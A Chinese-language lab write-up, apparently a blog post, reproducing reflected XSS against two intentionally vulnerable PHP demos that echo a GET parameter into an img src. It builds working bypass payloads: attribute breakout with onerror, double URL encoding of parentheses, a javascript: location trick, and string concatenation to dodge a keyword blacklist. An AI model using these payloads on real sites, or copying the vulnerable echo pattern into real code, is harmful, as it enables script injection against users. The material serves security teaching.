GET传递的参数直接输出在src中会存在反射型xss漏洞,本次复现的目的是利用url编码规则构造url绕过xss限制。
UrlEncode编码规则:将需要转码的字符的ASCII码值转为16进制,然后从右到左,取4位(不足4位直接处理),每2位做一位,前面加上%,编码成%XY格式。
Demo1源代码
<?php
header('X-XSS-Protection: 0');
$xss = isset($_GET['xss'])? $_GET['xss'] : '';
$xss = str_replace(array("(",")","&","\\","<",">","'"), '', $xss);
echo "<img src=\"{$xss}\">";
?>
分析
通过分析源代码可知屏幕上打印图片路径来自于GET传递的参数,同时会将接收到参数中的()$<>'等字符均会被替换为空格。<>被过滤,闭合标签写入新标签不可行;&被过滤,使用&#的HTML实体编码不可行,因此使用url编码。
构造url:
闭合双引号,逃逸出限制,利用GET传递一个不存在的参数和onerror函数来触发弹窗
127.0.0.1/demo.php?xss=aa" onerror="alert(1)
使用url编码替换()
127.0.0.1/demo.php?xss=aa" onerror="alert%281%29
但浏览器会在提交数据时先进行一次转码,所以进入函数时%28%29又会被转换为()。我们需要让转码后的数据进入函数时保持在%28%29的状态,而%的url编码是%25,因此我们可以这样构建
127.0.0.1/demo.php?xss=aa" onerror="alert%25281%2529
这样在进入时显示为
127.0.0.1/demo.php?xss=aa" onerror="alert%281%29
而在浏览器显示数据时又被转换为
127.0.0.1/demo.php?xss=aa" onerror="alert(1)
但通过观察控制台返回的数据发现%28%29并没有被转换,因为onerror是一个js函数,而在js的语法中不能编码符号
我们可以利用location来绕过这一限制, location会将等号右边的所有值变成字符串变量,而变量在js中可以编码,相应的"alert()“替换为JavaScript的一个伪协议"javascript:alert()”,于是
127.0.0.1/demo.php?xss=aa" onerror=location="javascript:alert%25281%2529
Demo2源代码
<?php
header('X-XSS-Protection: 0');
$xss = isset($_GET['xss'])?$_GET['xss']:'';
$xss = str_replace(array("(",")","&","\\","<",">","'"), '', $xss);
if (preg_match('/(script|document|cookie|eval|setTimeout|alert)/', $xss)) {
exit('bad');
}
echo "<img src=\"{$xss}\">";
?>
分析
相较于前面这里多了对script、alert的关键字限制 。
由于location会将等号右边的值转化为字符串,因此可以利用字符串可拼接的特性绕过关键字限制。
只有字母和数字[0-9a-zA-Z]、一些特殊符号“$-_.+!*'(),”[不包括双引号]、以及某些保留字,才可以不经过编码直接用于url。urlcode不识别加号,所以需要将+转化为%2b,这样在进入时才会被转换为+,返回时正确拼接。
构造的url如下
127.0.0.1/demo1.php?xss=aa" onerror=location="javas"%2b"cript:a"%2b"lert%25281%2529
扫一扫
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
